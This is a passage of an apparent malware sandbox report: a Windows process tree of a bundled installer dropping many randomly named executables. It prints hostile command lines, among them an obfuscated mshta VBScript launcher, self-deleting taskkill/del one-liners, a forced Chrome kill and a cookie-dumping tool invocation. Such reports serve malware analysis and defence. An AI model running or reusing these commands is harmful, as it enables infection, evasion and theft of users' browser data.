                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:5520
                                                            • C:\Users\Admin\AppData\Local\Temp\is-G9MI6.tmp\Setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-G9MI6.tmp\Setup.exe" /silent /subid=720
                                                              7⤵
                                                                PID:6044
                                                                • C:\Users\Admin\AppData\Local\Temp\is-SCA12.tmp\Setup.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-SCA12.tmp\Setup.tmp" /SL5="$10576,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-G9MI6.tmp\Setup.exe" /silent /subid=720
                                                                  8⤵
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  • Modifies registry class
                                                                  • Modifies system certificate store
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:6396
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                    9⤵
                                                                    • Blocklisted process makes network request
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:5388
                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                      tapinstall.exe remove tap0901
                                                                      10⤵
                                                                      • Checks SCSI registry key(s)
                                                                      PID:4548
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                    9⤵
                                                                      PID:6752
                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                        10⤵
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Windows directory
                                                                        • Checks SCSI registry key(s)
                                                                        PID:5456
                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                      9⤵
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:6780
                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                      9⤵
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:6688
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5400
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                6⤵
                                                                  PID:8808
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:8244
                                                              • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:1004
                                                                • C:\Users\Admin\AppData\Local\Temp\is-28KEG.tmp\MediaBurner2.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-28KEG.tmp\MediaBurner2.tmp" /SL5="$2030A,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                  6⤵
                                                                    PID:5744
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:3976
                                                                  • C:\Users\Admin\AppData\Roaming\6241361.exe
                                                                    "C:\Users\Admin\AppData\Roaming\6241361.exe"
                                                                    6⤵
                                                                    • Suspicious behavior: SetClipboardViewer
                                                                    PID:6876
                                                                  • C:\Users\Admin\AppData\Roaming\1086012.exe
                                                                    "C:\Users\Admin\AppData\Roaming\1086012.exe"
                                                                    6⤵
                                                                      PID:7056
                                                                    • C:\Users\Admin\AppData\Roaming\6520919.exe
                                                                      "C:\Users\Admin\AppData\Roaming\6520919.exe"
                                                                      6⤵
                                                                        PID:6912
                                                                      • C:\Users\Admin\AppData\Roaming\8387744.exe
                                                                        "C:\Users\Admin\AppData\Roaming\8387744.exe"
                                                                        6⤵
                                                                          PID:6904
                                                                        • C:\Users\Admin\AppData\Roaming\8972023.exe
                                                                          "C:\Users\Admin\AppData\Roaming\8972023.exe"
                                                                          6⤵
                                                                            PID:6856
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                          5⤵
                                                                            PID:5624
                                                                            • C:\Users\Admin\Documents\tbowBH_5PnLgqpENGkTnSrjN.exe
                                                                              "C:\Users\Admin\Documents\tbowBH_5PnLgqpENGkTnSrjN.exe"
                                                                              6⤵
                                                                              • Loads dropped DLL
                                                                              • Checks processor information in registry
                                                                              PID:6932
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im tbowBH_5PnLgqpENGkTnSrjN.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\tbowBH_5PnLgqpENGkTnSrjN.exe" & del C:\ProgramData\*.dll & exit
                                                                                7⤵
                                                                                  PID:8916
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /im tbowBH_5PnLgqpENGkTnSrjN.exe /f
                                                                                    8⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:8312
                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                    timeout /t 6
                                                                                    8⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:2200
                                                                              • C:\Users\Admin\Documents\4StWcyVE4QIBhqZbXt6jnJtX.exe
                                                                                "C:\Users\Admin\Documents\4StWcyVE4QIBhqZbXt6jnJtX.exe"
                                                                                6⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:6920
                                                                                • C:\Users\Admin\Documents\4StWcyVE4QIBhqZbXt6jnJtX.exe
                                                                                  "C:\Users\Admin\Documents\4StWcyVE4QIBhqZbXt6jnJtX.exe"
                                                                                  7⤵
                                                                                    PID:2108
                                                                                  • C:\Users\Admin\Documents\4StWcyVE4QIBhqZbXt6jnJtX.exe
                                                                                    "C:\Users\Admin\Documents\4StWcyVE4QIBhqZbXt6jnJtX.exe"
                                                                                    7⤵
                                                                                      PID:4480
                                                                                  • C:\Users\Admin\Documents\YObgzPzoWNoF2dwOCYZ7akQE.exe
                                                                                    "C:\Users\Admin\Documents\YObgzPzoWNoF2dwOCYZ7akQE.exe"
                                                                                    6⤵
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:7064
                                                                                  • C:\Users\Admin\Documents\_xOAPlNySfl7jP4cZzxJiGzi.exe
                                                                                    "C:\Users\Admin\Documents\_xOAPlNySfl7jP4cZzxJiGzi.exe"
                                                                                    6⤵
                                                                                      PID:4920
                                                                                    • C:\Users\Admin\Documents\pUImJPxMVgpn7p1gI8UFGPGa.exe
                                                                                      "C:\Users\Admin\Documents\pUImJPxMVgpn7p1gI8UFGPGa.exe"
                                                                                      6⤵
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:4716
                                                                                    • C:\Users\Admin\Documents\E1Zsr6Kpj7ZfkFHMEBiRJFNL.exe
                                                                                      "C:\Users\Admin\Documents\E1Zsr6Kpj7ZfkFHMEBiRJFNL.exe"
                                                                                      6⤵
                                                                                        PID:6360
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im E1Zsr6Kpj7ZfkFHMEBiRJFNL.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\E1Zsr6Kpj7ZfkFHMEBiRJFNL.exe" & del C:\ProgramData\*.dll & exit
                                                                                          7⤵
                                                                                            PID:9088
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im E1Zsr6Kpj7ZfkFHMEBiRJFNL.exe /f
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:8460
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout /t 6
                                                                                              8⤵
                                                                                              • Loads dropped DLL
                                                                                              • Checks processor information in registry
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:6360
                                                                                        • C:\Users\Admin\Documents\4f88jtcGzn49TriVjmB4WA1a.exe
                                                                                          "C:\Users\Admin\Documents\4f88jtcGzn49TriVjmB4WA1a.exe"
                                                                                          6⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4576
                                                                                          • C:\Users\Admin\Documents\4f88jtcGzn49TriVjmB4WA1a.exe
                                                                                            C:\Users\Admin\Documents\4f88jtcGzn49TriVjmB4WA1a.exe
                                                                                            7⤵
                                                                                              PID:7440
                                                                                            • C:\Users\Admin\Documents\4f88jtcGzn49TriVjmB4WA1a.exe
                                                                                              C:\Users\Admin\Documents\4f88jtcGzn49TriVjmB4WA1a.exe
                                                                                              7⤵
                                                                                                PID:7768
                                                                                            • C:\Users\Admin\Documents\J9uLJmEhF1QUr7bKxSooMD_y.exe
                                                                                              "C:\Users\Admin\Documents\J9uLJmEhF1QUr7bKxSooMD_y.exe"
                                                                                              6⤵
                                                                                                PID:6104
                                                                                              • C:\Users\Admin\Documents\Gy3hTX47wsF176iaQQaLein3.exe
                                                                                                "C:\Users\Admin\Documents\Gy3hTX47wsF176iaQQaLein3.exe"
                                                                                                6⤵
                                                                                                  PID:4144
                                                                                                • C:\Users\Admin\Documents\EINDl3SfZD6WlbWb2x94dYsW.exe
                                                                                                  "C:\Users\Admin\Documents\EINDl3SfZD6WlbWb2x94dYsW.exe"
                                                                                                  6⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:7048
                                                                                                  • C:\Users\Admin\Documents\EINDl3SfZD6WlbWb2x94dYsW.exe
                                                                                                    C:\Users\Admin\Documents\EINDl3SfZD6WlbWb2x94dYsW.exe
                                                                                                    7⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:2272
                                                                                                • C:\Users\Admin\Documents\HsyA986YQbtYU0EiTWTsXUf5.exe
                                                                                                  "C:\Users\Admin\Documents\HsyA986YQbtYU0EiTWTsXUf5.exe"
                                                                                                  6⤵
                                                                                                    PID:6972
                                                                                                  • C:\Users\Admin\Documents\1Dohi2rIM0jvSEfar4TzaQjn.exe
                                                                                                    "C:\Users\Admin\Documents\1Dohi2rIM0jvSEfar4TzaQjn.exe"
                                                                                                    6⤵
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:6720
                                                                                                  • C:\Users\Admin\Documents\NkhsLTuigxX9Jj8Dvemnb5Ec.exe
                                                                                                    "C:\Users\Admin\Documents\NkhsLTuigxX9Jj8Dvemnb5Ec.exe"
                                                                                                    6⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:7256
                                                                                                  • C:\Users\Admin\Documents\KF4ZsQJeV0BEIqWhY_Tm7HId.exe
                                                                                                    "C:\Users\Admin\Documents\KF4ZsQJeV0BEIqWhY_Tm7HId.exe"
                                                                                                    6⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:7428
                                                                                                  • C:\Users\Admin\Documents\K2YnqxnM1zpNfKeoivD3LNNf.exe
                                                                                                    "C:\Users\Admin\Documents\K2YnqxnM1zpNfKeoivD3LNNf.exe"
                                                                                                    6⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:7560
                                                                                                  • C:\Users\Admin\Documents\RTtudwUAnyskydkl1kTXhVGQ.exe
                                                                                                    "C:\Users\Admin\Documents\RTtudwUAnyskydkl1kTXhVGQ.exe"
                                                                                                    6⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:7660
                                                                                                    • C:\Users\Admin\Documents\RTtudwUAnyskydkl1kTXhVGQ.exe
                                                                                                      C:\Users\Admin\Documents\RTtudwUAnyskydkl1kTXhVGQ.exe
                                                                                                      7⤵
                                                                                                        PID:7844
                                                                                                    • C:\Users\Admin\Documents\QXxFNl9F38OlqrisaEoWokUb.exe
                                                                                                      "C:\Users\Admin\Documents\QXxFNl9F38OlqrisaEoWokUb.exe"
                                                                                                      6⤵
                                                                                                        PID:7552
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0J4KJ.tmp\QXxFNl9F38OlqrisaEoWokUb.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0J4KJ.tmp\QXxFNl9F38OlqrisaEoWokUb.tmp" /SL5="$20652,138429,56832,C:\Users\Admin\Documents\QXxFNl9F38OlqrisaEoWokUb.exe"
                                                                                                          7⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          PID:7740
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-CUN8A.tmp\Setup.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-CUN8A.tmp\Setup.exe" /Verysilent
                                                                                                            8⤵
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:8472
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                              9⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Enumerates connected drives
                                                                                                              • Modifies system certificate store
                                                                                                              PID:8676
                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472583 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                10⤵
                                                                                                                  PID:6496
                                                                                                        • C:\Users\Admin\Documents\syKY9aBJ45hv_bVSZVTIL7n7.exe
                                                                                                          "C:\Users\Admin\Documents\syKY9aBJ45hv_bVSZVTIL7n7.exe"
                                                                                                          6⤵
                                                                                                            PID:7864
                                                                                                            • C:\Users\Admin\AppData\Roaming\4179308.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\4179308.exe"
                                                                                                              7⤵
                                                                                                                PID:7360
                                                                                                              • C:\Users\Admin\AppData\Roaming\8584811.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\8584811.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:5048
                                                                                                              • C:\Users\Admin\AppData\Roaming\5182923.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\5182923.exe"
                                                                                                                7⤵
                                                                                                                  PID:5224
                                                                                                                • C:\Users\Admin\AppData\Roaming\8026948.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\8026948.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks computer location settings
                                                                                                                  PID:5624
                                                                                                              • C:\Users\Admin\Documents\RMsyFgVez2ba1Ga75O36k6gB.exe
                                                                                                                "C:\Users\Admin\Documents\RMsyFgVez2ba1Ga75O36k6gB.exe"
                                                                                                                6⤵
                                                                                                                  PID:7200
                                                                                                                • C:\Users\Admin\Documents\WYCIntkpnHy_15g8dDOpOUEt.exe
                                                                                                                  "C:\Users\Admin\Documents\WYCIntkpnHy_15g8dDOpOUEt.exe"
                                                                                                                  6⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:6076
                                                                                                                  • C:\Users\Admin\Documents\WYCIntkpnHy_15g8dDOpOUEt.exe
                                                                                                                    "C:\Users\Admin\Documents\WYCIntkpnHy_15g8dDOpOUEt.exe"
                                                                                                                    7⤵
                                                                                                                      PID:4920
                                                                                                                    • C:\Users\Admin\Documents\WYCIntkpnHy_15g8dDOpOUEt.exe
                                                                                                                      "C:\Users\Admin\Documents\WYCIntkpnHy_15g8dDOpOUEt.exe"
                                                                                                                      7⤵
                                                                                                                        PID:6752
                                                                                                                    • C:\Users\Admin\Documents\oLO6giJ5SDbG0FSt7jWC__eF.exe
                                                                                                                      "C:\Users\Admin\Documents\oLO6giJ5SDbG0FSt7jWC__eF.exe"
                                                                                                                      6⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:1180
                                                                                                                    • C:\Users\Admin\Documents\YpYsDuHlP0OQPjdiZr_D9imq.exe
                                                                                                                      "C:\Users\Admin\Documents\YpYsDuHlP0OQPjdiZr_D9imq.exe"
                                                                                                                      6⤵
                                                                                                                        PID:6368
                                                                                                                        • C:\Users\Admin\Documents\YpYsDuHlP0OQPjdiZr_D9imq.exe
                                                                                                                          "C:\Users\Admin\Documents\YpYsDuHlP0OQPjdiZr_D9imq.exe"
                                                                                                                          7⤵
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:4824
                                                                                                                      • C:\Users\Admin\Documents\rxU2p_WYxr3LJNT2yulG5p6E.exe
                                                                                                                        "C:\Users\Admin\Documents\rxU2p_WYxr3LJNT2yulG5p6E.exe"
                                                                                                                        6⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks processor information in registry
                                                                                                                        PID:2760
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im rxU2p_WYxr3LJNT2yulG5p6E.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\rxU2p_WYxr3LJNT2yulG5p6E.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                          7⤵
                                                                                                                            PID:6524
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /im rxU2p_WYxr3LJNT2yulG5p6E.exe /f
                                                                                                                              8⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:8904
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout /t 6
                                                                                                                              8⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:6460
                                                                                                                        • C:\Users\Admin\Documents\OWYPfdwgeWNvqQvM5YeQgHP8.exe
                                                                                                                          "C:\Users\Admin\Documents\OWYPfdwgeWNvqQvM5YeQgHP8.exe"
                                                                                                                          6⤵
                                                                                                                            PID:4920
                                                                                                                            • C:\Users\Admin\Documents\OWYPfdwgeWNvqQvM5YeQgHP8.exe
                                                                                                                              "C:\Users\Admin\Documents\OWYPfdwgeWNvqQvM5YeQgHP8.exe"
                                                                                                                              7⤵
                                                                                                                                PID:8376
                                                                                                                            • C:\Users\Admin\Documents\rDX_izFcjzSufw8vXlO4b4fI.exe
                                                                                                                              "C:\Users\Admin\Documents\rDX_izFcjzSufw8vXlO4b4fI.exe"
                                                                                                                              6⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:8160
                                                                                                                              • C:\Users\Admin\Documents\rDX_izFcjzSufw8vXlO4b4fI.exe
                                                                                                                                "C:\Users\Admin\Documents\rDX_izFcjzSufw8vXlO4b4fI.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:3100
                                                                                                                              • C:\Users\Admin\Documents\DeFYlDpeYEh7w8eMx40y0R8c.exe
                                                                                                                                "C:\Users\Admin\Documents\DeFYlDpeYEh7w8eMx40y0R8c.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:7508
                                                                                                                                  • C:\Users\Admin\Documents\DeFYlDpeYEh7w8eMx40y0R8c.exe
                                                                                                                                    "C:\Users\Admin\Documents\DeFYlDpeYEh7w8eMx40y0R8c.exe" -q
                                                                                                                                    7⤵
                                                                                                                                      PID:4428
                                                                                                                                  • C:\Users\Admin\Documents\0Z1W6bzxEZmOnsYXR9IjCzRV.exe
                                                                                                                                    "C:\Users\Admin\Documents\0Z1W6bzxEZmOnsYXR9IjCzRV.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:2612
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\0Z1W6B~1.DLL,s C:\Users\Admin\DOCUME~1\0Z1W6B~1.EXE
                                                                                                                                        7⤵
                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                        PID:9428
                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:324
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpD54D_tmp.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tmpD54D_tmp.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:4360
                                                                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:2352
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                            7⤵
                                                                                                                                              PID:5264
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd
                                                                                                                                                8⤵
                                                                                                                                                  PID:5980
                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                    9⤵
                                                                                                                                                      PID:8268
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                      Esplorarne.exe.com i
                                                                                                                                                      9⤵
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:9104
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        10⤵
                                                                                                                                                        • Drops startup file
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:792
                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                      ping RJMQBVDN -n 30
                                                                                                                                                      9⤵
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:7748
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5516
                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                6⤵
                                                                                                                                                  PID:5320
                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                5⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:6080
                                                                                                                                        • C:\Users\Admin\Documents\iCQyP6L7RNEj270CVrwgnyNK.exe
                                                                                                                                          "C:\Users\Admin\Documents\iCQyP6L7RNEj270CVrwgnyNK.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3616
                                                                                                                                          • C:\Users\Admin\Documents\iCQyP6L7RNEj270CVrwgnyNK.exe
                                                                                                                                            "C:\Users\Admin\Documents\iCQyP6L7RNEj270CVrwgnyNK.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4656
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                                        hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4764
                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                          "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                          2⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:220
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                            3⤵
                                                                                                                                              PID:4260
                                                                                                                                            • C:\Users\Admin\Documents\gImcae9NIkoQ0kvxxVAISwM4.exe
                                                                                                                                              C:\Users\Admin\Documents\gImcae9NIkoQ0kvxxVAISwM4.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:5024
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                            2⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:5976
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                          1⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5148
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-92KNR.tmp\Inlog.tmp
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-92KNR.tmp\Inlog.tmp" /SL5="$1031E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                          1⤵
                                                                                                                                            PID:5048
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-BK90T.tmp\Setup.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-BK90T.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                              2⤵
                                                                                                                                                PID:7188
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-SRV2J.tmp\Setup.tmp
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-SRV2J.tmp\Setup.tmp" /SL5="$10610,17367683,721408,C:\Users\Admin\AppData\Local\Temp\is-BK90T.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                  3⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:7616
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-MBJLT.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                    4⤵
                                                                                                                                                      PID:7604
                                                                                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                        expand C:\Users\Admin\AppData\Local\Temp\is-MBJLT.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                        5⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        PID:7656
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
